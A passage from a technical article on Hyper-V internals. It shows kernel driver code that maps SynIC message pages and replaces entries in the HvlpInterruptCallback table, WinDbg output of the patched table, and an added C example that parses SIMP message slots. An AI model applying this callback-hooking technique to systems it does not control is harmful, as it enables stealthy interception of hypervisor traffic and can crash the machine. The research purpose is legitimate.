<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchmHvlRegisterInterruptCallback((</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&ArchXPartEnlightenedIsr, (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvHvlpInterruptCallbackOrig, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">XPART_ENLIGHTENED_ISR3_INDEX</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// The SIMP and SIEFP MSRs are per virtual processor, so the thread is pinned to each processor in turn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// to read that processor's values. Bit 0 of each MSR is the enable flag, bits 63:12 hold the page number</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// of the SIM/SIEF page. Each page is mapped with MmMapIoSpace and the virtual address is kept in an array for later:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// the SIM page holds 16 HV_MESSAGE slots (256 bytes each), one per SINT; the SIEF page holds 16 event flag sets.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// Note: 1i64 << i only addresses processors of the first processor group (at most 64 processors).</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">for</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (i = 0; i < ProcessorCount; i++){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ULONGLONG</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Simp, Siefp;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">KAFFINITY</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> OldAffinity = KeSetSystemAffinityThreadEx(1i64 << i);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Current processor number"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, KeGetCurrentProcessorNumberEx(</span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Simp = ArchReadMsr(</span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_X64_MSR_SIMP</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Siefp = ArchReadMsr(</span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_X64_MSR_SIEFP</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> // restore the affinity as soon as the MSRs are read, so the thread is not left pinned on any exit path</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> KeRevertToUserAffinityThreadEx(OldAffinity);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (!(Simp & 1) || !(Siefp & 1)){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">  </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"SynIC SIMP/SIEFP is not enabled on this processor"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">  </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 1;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> }</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> pAdr.QuadPart = Simp & 0xFFFFFFFFFFFFF000;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> pvSIMP[i] = MmMapIoSpace(pAdr, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PAGE_SIZE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, MmCached);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (pvSIMP[i] == </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">  </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Error during pvSIMP MmMapIoSpace"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">  </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 1;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> }</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog16</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"pvSIMP[i] address"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, pvSIMP[i]);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> pAdr.QuadPart = Siefp & 0xFFFFFFFFFFFFF000;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> pvSIEFP[i] = MmMapIoSpace(pAdr, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PAGE_SIZE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, MmCached);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (pvSIEFP[i] == </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">  </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Error during pvSIEFP MmMapIoSpace"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">  </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 1;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> }</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog16</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"pvSIEFP address"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, pvSIEFP[i]);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After RegisterInterrupt has run (in the variant that replaces all handlers at once), the HvlpInterruptCallback table looks like this:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dps HvlpInterruptCallback</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`5a9ccc30 fffff800`4e9cc0a9 hyperv4!ArchmWinHvOnInterrupt </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`5a9ccc38 fffff800`4e9cc0e3 hyperv4!ArchXPartEnlightenedIsr </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`5a9ccc40 fffff800`4e9cc0e3 hyperv4!ArchXPartEnlightenedIsr </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`5a9ccc48 fffff800`4e9cc0e3 hyperv4!ArchXPartEnlightenedIsr </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`5a9ccc50 fffff800`4e9cc0e3 hyperv4!ArchXPartEnlightenedIsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`5a9ccc58 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(However, in experiments with a heavily loaded virtual machine it is better to replace only one handler, because replacing all of them at once makes the system unstable.)</span></div>
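<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Before looking at the replacement handlers, here is an added stand-alone example (not code from the original article or from the hyperv4 driver) of the work a routine called from such a hook has to do on the SynIC message page (SIMP): walk the 16 HV_MESSAGE slots, one per SINT, pick out the ones whose MessageType is not None, and consume a slot the way the TLFS requires, by clearing MessageType and then writing the EOM MSR only if the hypervisor set the MessagePending flag. The structure layouts follow the TLFS HV_MESSAGE definition; the page content, the PortId value and the slot-1 message type are constructed for the demo, and the EOM MSR write itself is left to the caller since it only exists inside a driver.</span></div>

```c
/* Added example: parsing and consuming SynIC message page (SIMP) slots.
 * Layouts follow the TLFS HV_MESSAGE definition; the sample page built
 * by hv_sim_build_sample() is constructed, not captured from a system. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define HV_PAGE_SIZE                  4096
#define HV_MESSAGE_SIZE               256
#define HV_MESSAGE_PAYLOAD_BYTE_COUNT 240
#define HV_SYNIC_SINT_COUNT           16      /* one slot per SINT */
#define HV_MESSAGE_TYPE_NONE          0x00000000u
#define HV_MESSAGE_FLAG_PENDING       0x01u   /* MessageFlags bit 0 */
/* TLFS value used for the sample message in slot 2 (HvMessageTypeUnmappedGpa). */
#define HV_MESSAGE_TYPE_UNMAPPED_GPA  0x80000000u

#pragma pack(push, 1)
typedef struct _HV_MESSAGE_HEADER {
    uint32_t MessageType;
    uint8_t  PayloadSize;      /* payload length in 8-byte units */
    uint8_t  MessageFlags;     /* bit 0 = MessagePending */
    uint8_t  Reserved[2];
    uint64_t PortId;           /* sender partition id or port id, by type */
} HV_MESSAGE_HEADER;

typedef struct _HV_MESSAGE {
    HV_MESSAGE_HEADER Header;
    uint8_t Payload[HV_MESSAGE_PAYLOAD_BYTE_COUNT];
} HV_MESSAGE;
#pragma pack(pop)

/* Slot n of the page belongs to SINTn: the "pvSIMP + n * HV_MESSAGE_SIZE" arithmetic. */
HV_MESSAGE *hv_sim_slot(uint8_t *simp, unsigned sint)
{
    return (HV_MESSAGE *)(simp + (size_t)sint * HV_MESSAGE_SIZE);
}

/* Scan all 16 slots; fill `found` with the SINT indices that hold a message.
 * Returns how many slots are occupied. */
unsigned hv_sim_scan(uint8_t *simp, unsigned found[HV_SYNIC_SINT_COUNT])
{
    unsigned n = 0;
    for (unsigned s = 0; s < HV_SYNIC_SINT_COUNT; s++) {
        if (hv_sim_slot(simp, s)->Header.MessageType != HV_MESSAGE_TYPE_NONE)
            found[n++] = s;
    }
    return n;
}

/* Consume one slot: copy the header out, release the slot by writing
 * MessageType = None, then report whether the caller must write the EOM MSR.
 * Returns 1 if a message was consumed, 0 if the slot was empty. */
int hv_message_consume(HV_MESSAGE *msg, HV_MESSAGE_HEADER *out, int *need_eom)
{
    *need_eom = 0;
    if (msg->Header.MessageType == HV_MESSAGE_TYPE_NONE)
        return 0;
    *out = msg->Header;
    /* The hypervisor owns this field once it is cleared: use a volatile store,
     * and in a driver put a full memory barrier here before reading the flags. */
    *(volatile uint32_t *)&msg->Header.MessageType = HV_MESSAGE_TYPE_NONE;
    /* MessagePending means the hypervisor had a further message queued for this
     * SINT while the slot was busy; only then must the guest write HV_X64_MSR_EOM. */
    if (msg->Header.MessageFlags & HV_MESSAGE_FLAG_PENDING)
        *need_eom = 1;
    return 1;
}

/* Constructed sample: a 4 KB SIM page with messages in slots 1 and 2.
 * Slot 2 carries MessagePending, so consuming it must require an EOM write. */
void hv_sim_build_sample(uint8_t simp[HV_PAGE_SIZE])
{
    memset(simp, 0, HV_PAGE_SIZE);
    HV_MESSAGE *m1 = hv_sim_slot(simp, 1);
    m1->Header.MessageType = 0x00000001u;          /* constructed type value */
    m1->Header.PayloadSize = 1;
    HV_MESSAGE *m2 = hv_sim_slot(simp, 2);
    m2->Header.MessageType  = HV_MESSAGE_TYPE_UNMAPPED_GPA;
    m2->Header.PayloadSize  = 2;
    m2->Header.MessageFlags = HV_MESSAGE_FLAG_PENDING;
    m2->Header.PortId       = 0x1234;              /* constructed */
    for (unsigned i = 0; i < 16; i++)              /* constructed payload bytes */
        m2->Payload[i] = (uint8_t)i;
}

int main(void)
{
    uint8_t page[HV_PAGE_SIZE];
    unsigned found[HV_SYNIC_SINT_COUNT];
    hv_sim_build_sample(page);
    unsigned n = hv_sim_scan(page, found);
    for (unsigned i = 0; i < n; i++) {
        HV_MESSAGE_HEADER h;
        int eom;
        hv_message_consume(hv_sim_slot(page, found[i]), &h, &eom);
        printf("SINT%u: type=0x%08x payload=%u qwords pending=%d -> EOM %s\n",
               found[i], h.MessageType, h.PayloadSize,
               (h.MessageFlags & HV_MESSAGE_FLAG_PENDING) != 0, eom ? "yes" : "no");
    }
    return 0;
}
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The reason the scan is separated from the consume step matters for a hook: a logging hook that only reads the slot, as the article's ParseHvMessage does, must leave MessageType alone and let the original handler clear it and write EOM, otherwise the original handler sees an empty slot and the message is lost; a hook that does take ownership of the slot has to perform both steps itself.</span></div>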
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The replacement mirrors the original layout: one handler for hypervisor messages and four handlers for messages from the VMBus. The procedures ArchmWinHvOnInterrupt and ArchXPartEnlightenedIsr save all general-purpose registers on the stack, call the parse functions ParseHvMessage and ParseVmbusMessage respectively, restore the registers and jump to the original handler (mPUSHAD and mPOPAD are macros that save and restore the registers on the stack):</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
